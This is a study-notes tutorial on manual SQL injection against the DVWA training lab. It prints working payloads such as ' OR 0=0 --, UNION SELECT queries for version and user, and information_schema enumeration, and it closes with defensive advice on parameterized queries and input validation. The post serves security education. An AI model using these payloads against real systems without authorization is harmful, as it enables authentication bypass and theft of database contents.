This post is a tutorial focused on explaining SQL Injection (SQLi) attacks using manual methods without relying on automated tools. The demonstration is conducted on the Damn Vulnerable Web Application (DVWA) running on Metasploitable 2 Linux. The tutorial provides an in-depth guide on identifying and exploiting SQL injection vulnerabilities step-by-step.

OSCP Study Notes

Offensive Security Web Assessor (OSWA) Study Notes

Introduction to SQL Injection

  • SQL Injection allows attackers to manipulate database queries by inserting malicious input.
  • Common targets include login forms, search boxes, and any input fields interacting with databases.

Difference Between Manual and Automated Testing

  • Automated Testing is more efficient for large-scale assessments across many targets.
  • Manual Testing is preferred for detailed examination of one or two targets.

Initial Testing for SQL Injection

  • Entering simple input like 1 in a vulnerable input box reveals database entries, indicating how SQL queries are constructed.
  • The backend query resembles:
SELECT * FROM users WHERE id = 1;
  • Changing the input value reveals different records, confirming data retrieval from a database.

Error-Based SQL Injection Detection

  • Inserting a single quote (') into input fields triggers a syntax error, confirming SQL query manipulation.
  • Error messages often reveal the database type (e.g., MySQL, MariaDB), aiding attackers.

Basic SQL Injection Exploit

  • Injecting payloads like:
' OR 0=0 --
  • manipulates the query logic, making conditions always true, thus retrieving all data from the database.

Understanding the Injection Logic

  • The injected query might look like:
SELECT * FROM users WHERE username = '' OR 0=0 -- ';
  • The OR 0=0 condition always evaluates to true, bypassing authentication and granting access.

Using Comments to Bypass Queries

  • The -- (double dash) symbol is used to comment out the rest of the SQL query, preventing errors from unclosed statements.

Advanced SQL Injection: UNION-Based Injection

  • UNION SELECT allows attackers to combine results from multiple queries.
    Example:
' UNION SELECT null, version(), user() --
  • This retrieves the database version, current user, and other sensitive information.

Enumerating Database Information

  • Accessing the information_schema database allows listing tables and columns.
    Example:
' UNION SELECT table_name, null FROM information_schema.tables --
  • This helps attackers map the database structure.

Escalation and Further Exploitation

  • After identifying vulnerabilities, attackers can escalate privileges, potentially leading to command execution or full system compromise.
  • Knowing the current directory and user privileges helps in advancing the attack.

Conclusion and Recommendations

  • Input Validation: Applications must properly validate and sanitize user inputs to prevent SQL injection.
  • Parameterized Queries: Developers should use prepared statements and parameterized queries to avoid direct insertion of user input into SQL queries.
  • Error Handling: Error messages should be generic to avoid leaking database information.
  • Least Privilege Principle: Database accounts should have the minimal required permissions.

Video Walkthrough

,
Show Comments

MasterMind Study Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles